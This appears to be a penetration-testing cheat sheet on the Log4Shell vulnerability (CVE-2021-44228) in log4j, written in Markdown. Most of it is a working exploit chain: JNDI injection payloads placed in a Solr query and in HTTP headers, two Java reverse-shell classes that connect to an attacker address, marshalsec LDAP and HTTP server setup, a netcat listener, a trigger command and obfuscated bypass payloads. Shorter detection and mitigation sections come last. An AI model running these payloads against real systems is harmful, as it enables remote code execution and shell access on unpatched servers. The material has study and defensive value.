134 lines
4.3 KiB
Markdown
134 lines
4.3 KiB
Markdown
|
# Log4Shell
|
||
|
|
||
|
* `log4j` < version 2.15.0rc2
|
||
|
* [CVE-2021-44228](https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java)
|
||
|
* [log4j vulnerability tester](https://log4shell.huntress.com/)
|
||
|
* [List of exploitable services](https://github.com/YfryTchsGD/Log4jAttackSurface)
|
||
|
|
||
|
* Code inside a `param` value is parsed and a `${payload}` will be executed, for example
|
||
|
```sh
|
||
|
${sys:os.name}
|
||
|
${sys:user.name}
|
||
|
${log4j:configParentLocation}
|
||
|
${ENV:PATH}
|
||
|
${ENV:HOSTNAME}
|
||
|
${java:version}
|
||
|
```
|
||
|
## Java Naming and Directory Interface JNDI
|
||
|
|
||
|
* Vulnerability can be exploited via `${jndi:ldap://<attacker-IP>/foo}`
|
||
|
|
||
|
## POC
|
||
|
```sh
|
||
|
curl 'http://$TARGET:8983/solr/admin/cores?foo=?$\{jndi:ldap://$ATTACKER_IP:4449\}'
|
||
|
```
|
||
|
* Use HTTP header field as storage for payload or any other possible input field
|
||
|
```HTTP
|
||
|
X-Forwarded-For: ${jndi:ldap://$ATTACKER_IP:1389/foo}
|
||
|
Accept: ${jndi:ldap://$ATTACKER_IP:1389/foo}
|
||
|
X-Api-Version: ${jndi:ldap://$ATTACKER_IP:1389/foo}
|
||
|
```
|
||
|
|
||
|
## Usage
|
||
|
|
||
|
* Fuzz endpoints to applicate the exploit on
|
||
|
* Clone and build [marshallsec](https://github.com/mbechler/marshalsec) via `mvn clean package -DskipTests`
|
||
|
* Java version should be the same as the one on the target
|
||
|
* A Proxy LDAP server to an HTTP server is needed
|
||
|
|
||
|
* Compile following Java reverse shell via `javac Exploit.java -source 8 -target 8` to Exploit.class
|
||
|
```java
|
||
|
public class Exploit {
|
||
|
static {
|
||
|
try {
|
||
|
java.lang.Runtime.getRuntime().exec("nc -e /bin/bash $ATTACKER_IP 4449");
|
||
|
} catch (Exception e) {
|
||
|
e.printStackTrace();
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
```
|
||
|
or another one
|
||
|
```java
|
||
|
import java.io.InputStream;
|
||
|
import java.io.OutputStream;
|
||
|
import java.net.Socket;
|
||
|
|
||
|
public class Exploit {
|
||
|
static {
|
||
|
String host = "$ATTACKER_IP";
|
||
|
int port = 4711;
|
||
|
String cmd = "/bin/sh";
|
||
|
try {
|
||
|
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
|
||
|
Socket s = new Socket(host, port);
|
||
|
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
|
||
|
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
|
||
|
while (!s.isClosed()) {
|
||
|
while (pi.available() > 0)
|
||
|
so.write(pi.read());
|
||
|
while (pe.available() > 0)
|
||
|
so.write(pe.read());
|
||
|
while (si.available() > 0)
|
||
|
po.write(si.read());
|
||
|
so.flush();
|
||
|
po.flush();
|
||
|
Thread.sleep(50);
|
||
|
try {
|
||
|
p.exitValue();
|
||
|
break;
|
||
|
} catch (Exception e) {
|
||
|
}
|
||
|
}
|
||
|
p.destroy();
|
||
|
s.close();
|
||
|
} catch (Exception e) {
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
```
|
||
|
|
||
|
* Run the LDAP, HTTP and reverse shell
|
||
|
```sh
|
||
|
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit"
|
||
|
```
|
||
|
```sh
|
||
|
php -S 0.0.0.0:8000
|
||
|
```
|
||
|
```sh
|
||
|
nc -lvnp 4449
|
||
|
```
|
||
|
|
||
|
* Trigger via `curl 'http://$TARGET:8983/solr/admin/cores?foo=$\{jndi:ldap://$ATTACKER_IP:1389/Exploit\}'`
|
||
|
|
||
|
## Detection
|
||
|
|
||
|
* [Log4Shell-Hashes](https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes.git)
|
||
|
* [Vulnerable Class + Jar hashes](https://github.com/nccgroup/Cyber-Defence/tree/master/Intelligence/CVE-2021-44228)
|
||
|
* [reddit mega thread](https://www.reddit.com/r/sysadmin/comments/reqc6f/log4j_0day_being_exploited_mega_thread_overview/)
|
||
|
* [Yara rules](https://github.com/darkarnium/CVE-2021-44228)
|
||
|
|
||
|
* Parse logs for `jndi`
|
||
|
|
||
|
## Obfuscation
|
||
|
|
||
|
* Possible bypasses are as follows
|
||
|
```sh
|
||
|
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/}
|
||
|
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}
|
||
|
${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://attackerendpoint.com/}
|
||
|
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attackerendpoint.com/z}
|
||
|
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attackerendpoint.com/}
|
||
|
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://attackerendpoint.com/}
|
||
|
${${::-j}ndi:rmi://attackerendpoint.com/}
|
||
|
```
|
||
|
|
||
|
## Mitgation
|
||
|
|
||
|
* [Apache Solr security news](https://solr.apache.org/security.html)
|
||
|
* Add the following line to `solr.in.sh`
|
||
|
```toml
|
||
|
SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true"
|
||
|
10.10.90.21210.10.90.212
|
||
|
```
|